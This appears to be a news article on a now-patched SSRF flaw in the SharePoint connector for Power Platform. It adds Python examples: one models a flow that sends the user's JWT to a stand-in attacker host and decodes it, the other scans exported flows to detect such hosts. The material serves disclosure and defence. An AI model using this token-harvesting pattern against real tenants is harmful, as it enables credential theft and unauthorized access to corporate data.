Cybersecurity researchers have disclosed details of a now-patched vulnerability in the Microsoft SharePoint connector on the Power Platform that, if exploited, could let attackers harvest a user's credentials and use them to stage follow-on attacks against the sensitive data stored in SharePoint.

Exploiting the flaw would allow an attacker to send requests to the SharePoint API on behalf of a legitimate user and thereby read confidential information. According to a report from Zenity Labs, the impact is not confined to a single service: the technique works across several Power Platform services that use the connector, including Power Automate and Power Apps, which considerably widens the blast radius.

Senior security researcher Dmitry Lozovoy noted that the reach of the vulnerability is substantial, since an attack could compromise multiple interconnected services within the Power Platform ecosystem, and that organizations relying on these platforms need to stay vigilant.

Following responsible disclosure to Microsoft in September 2024, the company rated the issue "Important" severity. According to Microsoft's statement, the vulnerability was resolved as of December 13.

At its core, the vulnerability is a server-side request forgery (SSRF). The SharePoint connector's "custom value" feature lets a flow author supply their own URL as part of a flow; an attacker can point that URL at a server they control, and the connector will make the request on behalf of whichever user runs the flow. Pulling this off, however, requires holding specific roles within the Power Platform.

To carry out the attack, the attacker needs an account holding the Environment Maker and Basic User roles in Power Platform. Obtaining such an account typically requires an initial foothold in the target organization, so the flaw is a post-compromise privilege-escalation and lateral-movement primitive rather than an initial-access vector.
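To make the SSRF concrete, here is a minimal model of the mechanism the text describes, written for this article rather than taken from the SharePoint connector: a "custom value" site URL that the connector calls with the running user's bearer token, shown beside a hardened version that validates the host first. The function names, the tenant host allowlist, the API path and the unsigned sample token are all assumptions; the `peek_jwt_claims` helper shows what an attacker's collector endpoint learns from a token that lands in its logs.

```python
# Added example, written for this article: a minimal model of the SSRF the
# text describes (a caller-supplied "custom value" site URL that the connector
# calls with the running user's token), beside a hardened version. It is not
# the SharePoint connector's code; the function names, the host allowlist and
# the sample token are assumptions.
import base64
import json
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist of the tenant's own SharePoint hosts (assumption).
ALLOWED_SHAREPOINT_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Constructed, unsigned stand-in for the victim's SharePoint JWT.
SAMPLE_TOKEN = ".".join([
    _b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode()),
    _b64url(json.dumps({"aud": "https://contoso.sharepoint.com",
                        "upn": "victim@contoso.example",
                        "exp": 1734100000}).encode()),
    "",  # no signature
])


def build_request_vulnerable(site_url: str, api_path: str, user_token: str) -> dict:
    """Connector that trusts the flow author's site URL as typed.

    The request, including the Authorization header of whoever *runs* the
    flow, goes to whatever host the author put in the custom value field.
    """
    target = site_url.rstrip("/") + "/" + api_path.lstrip("/")
    return {
        "url": target,
        "host": urlsplit(target).hostname,
        "headers": {"Authorization": f"Bearer {user_token}"},
    }


def is_trusted_sharepoint_host(hostname: Optional[str]) -> bool:
    """Exact-match allowlist. A suffix check would accept
    contoso.sharepoint.com.attacker.example, so compare the whole host."""
    return hostname is not None and hostname.lower() in ALLOWED_SHAREPOINT_HOSTS


def build_request_hardened(site_url: str, api_path: str, user_token: str) -> dict:
    """Same connector, but the site URL is validated before any request
    carrying the user's token is built."""
    parts = urlsplit(site_url)
    if parts.scheme != "https":
        raise ValueError(f"refusing non-HTTPS site URL: {site_url}")
    if parts.username or parts.password:
        raise ValueError("refusing site URL with embedded credentials")
    if not is_trusted_sharepoint_host(parts.hostname):
        raise ValueError(f"site URL host is not a tenant SharePoint host: {parts.hostname}")
    return build_request_vulnerable(site_url, api_path, user_token)


def hardened_accepts(site_url: str) -> bool:
    """True if the hardened connector would build a request for site_url."""
    try:
        build_request_hardened(site_url, "_api/web/lists", SAMPLE_TOKEN)
        return True
    except ValueError:
        return False


def peek_jwt_claims(token: str) -> dict:
    """Decode a JWT payload WITHOUT verifying it: what a collector endpoint
    learns about a token that lands in its logs. Triage only, never authz."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


if __name__ == "__main__":
    evil = "https://sp-collector.attacker.example/sites/Finance"
    req = build_request_vulnerable(evil, "_api/web/lists", SAMPLE_TOKEN)
    leaked = req["headers"]["Authorization"].split(" ", 1)[1]
    print("vulnerable connector sends the token to:", req["host"])
    print("collector can read claims:", peek_jwt_claims(leaked))
    for url in (evil, "https://contoso.sharepoint.com.attacker.example/sites/HR",
                "http://contoso.sharepoint.com/sites/Finance"):
        print("hardened connector accepts", url, "->", hardened_accepts(url))
    print("hardened connector accepts the real site ->",
          hardened_accepts("https://contoso.sharepoint.com/sites/Finance"))
```

The allowlist is an exact host match on purpose: suffix or substring checks are the classic way SSRF filters get bypassed with lookalike hostnames, and the `username`/`password` check catches `https://contoso.sharepoint.com@attacker.example/` style URLs that read like the real site.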

In the scenario Zenity describes, the attacker builds a malicious flow that uses the SharePoint connector, points its site URL at a server they control, and shares the flow with an unsuspecting low-privileged user. When that user runs it, the connector's request carries the victim's SharePoint JSON Web Token (JWT), handing the attacker a credential for further unauthorized access.

With the captured JWT, the attacker can issue requests on the victim's behalf, significantly expanding their reach across the Power Platform. The same technique extends readily to other Power Platform services such as Power Apps and Copilot Studio, so the attack's impact can grow to cover a broader set of users.

The approach can also be extended to Power Apps: a malicious Canvas app embedded in a Teams channel could harvest a token from every user who interacts with it, turning one victim into a channel-wide collection point and illustrating how tightly coupled the Power Platform services are.
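A practical check for defenders hunting for the malicious flows described above, as an added example that is not Zenity's or Microsoft's tooling: scan exported Power Automate flow definitions for SharePoint connector actions whose site address points outside the tenant, or is a run-time expression that needs manual review. It assumes the export layout (`properties.definition.actions`, `OpenApiConnection` actions identified by an `apiId` ending in `shared_sharepointonline`, and the site address in the `dataset` parameter), the tenant host allowlist, and the constructed sample flow embedded in the code.

```python
# Added example, written for this article: a hunt over exported Power Automate
# flow definitions for SharePoint connector actions whose site address leaves
# the tenant. Not Zenity's or Microsoft's tooling. Assumptions: the export
# layout (properties.definition.actions, OpenApiConnection actions, an apiId
# ending in shared_sharepointonline, the site address in the "dataset"
# parameter), the tenant host allowlist and the constructed sample flow.
from typing import Any, Dict, Iterator, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SHAREPOINT_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}
SHAREPOINT_API_ID = "shared_sharepointonline"


def iter_actions(actions: Dict[str, Any], path: str = "") -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (path, action) for every action, descending into scopes, loops
    and conditions, which keep their children under 'actions' and
    'else'/'actions'. An action hidden several scopes deep must not escape."""
    for name, action in actions.items():
        full = f"{path}/{name}" if path else name
        yield full, action
        if isinstance(action.get("actions"), dict):
            yield from iter_actions(action["actions"], full)
        else_branch = action.get("else") or {}
        if isinstance(else_branch.get("actions"), dict):
            yield from iter_actions(else_branch["actions"], full + "/else")


def classify_site_url(value: Any) -> Tuple[str, str]:
    """Return (verdict, reason) with verdict 'ok', 'suspicious' or 'dynamic'."""
    if not isinstance(value, str):
        return "dynamic", "site address is not a plain string"
    if value.lstrip().startswith("@"):
        # Expressions such as @{variables('siteUrl')} are resolved at run time;
        # the scanner cannot know where they point.
        return "dynamic", "site address is an expression; resolve it manually"
    parts = urlsplit(value)
    if parts.scheme != "https":
        return "suspicious", f"non-HTTPS scheme {parts.scheme!r}"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_SHAREPOINT_HOSTS:
        # Exact match: a suffix test would pass contoso.sharepoint.com.attacker.example.
        return "suspicious", f"host {host!r} is not a tenant SharePoint host"
    return "ok", ""


def scan_flow(flow: Dict[str, Any]) -> List[Dict[str, str]]:
    """Report every SharePoint connector action whose site address is not
    a plain HTTPS URL on a tenant SharePoint host."""
    findings: List[Dict[str, str]] = []
    actions = flow.get("properties", {}).get("definition", {}).get("actions", {})
    for path, action in iter_actions(actions):
        inputs = action.get("inputs") or {}
        api_id = str((inputs.get("host") or {}).get("apiId", ""))
        if action.get("type") != "OpenApiConnection" or not api_id.endswith(SHAREPOINT_API_ID):
            continue
        site = (inputs.get("parameters") or {}).get("dataset")
        if site is None:
            continue  # operation without a site address parameter
        verdict, reason = classify_site_url(site)
        if verdict != "ok":
            findings.append({"action": path, "site": str(site), "verdict": verdict, "reason": reason})
    return findings


def _sp_action(operation: str, dataset: str) -> Dict[str, Any]:
    """Build a constructed SharePoint connector action for the sample flow."""
    return {"type": "OpenApiConnection",
            "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/" + SHAREPOINT_API_ID,
                                "operationId": operation},
                       "parameters": {"dataset": dataset, "table": "00000000-0000-0000-0000-000000000001"}}}


# Constructed sample export: one legitimate action, one custom-value URL to an
# attacker host, one lookalike host hidden in a condition branch, one dynamic
# expression in the else branch, and a non-SharePoint action that is skipped.
SAMPLE_FLOW = {"properties": {"displayName": "Weekly finance export", "definition": {"actions": {
    "Get_items_Finance": _sp_action("GetItems", "https://contoso.sharepoint.com/sites/Finance"),
    "Get_items_custom_value": _sp_action("GetItems", "https://sp-collector.attacker.example/sites/Finance"),
    "Condition": {
        "type": "If",
        "actions": {"Get_file_content": _sp_action(
            "GetFileContent", "https://contoso.sharepoint.com.attacker.example/sites/HR")},
        "else": {"actions": {"Get_items_dynamic": _sp_action("GetItems", "@{variables('siteUrl')}")}},
    },
    "Send_an_email": {"type": "OpenApiConnection",
                      "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_office365"},
                                 "parameters": {"emailMessage/To": "cfo@contoso.example"}}},
}}}}


if __name__ == "__main__":
    for finding in scan_flow(SAMPLE_FLOW):
        print(f"{finding['verdict']:10} {finding['action']:35} {finding['site']}  ({finding['reason']})")
```

Run it against every flow a tenant admin can export and triage the `suspicious` entries first; `dynamic` entries are not proof of anything, but a site address that is computed at run time is exactly how an attacker would keep the collector URL out of a static review, so they deserve a look at where the variable is set.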

Because Power Platform services are so tightly interconnected, and because the SharePoint connector is so widely used in front of repositories where sensitive corporate data resides, the flaw is a significant security concern. It calls for rigorous attention to access controls across the organization, including who holds the roles that allow building and sharing flows and apps.

The disclosure also follows a series of detailed reports of vulnerabilities in Azure DevOps that could have had similarly severe consequences, underscoring the ongoing need for vigilance around cloud development and automation platforms.

(This article has been updated to incorporate a statement from Microsoft.)
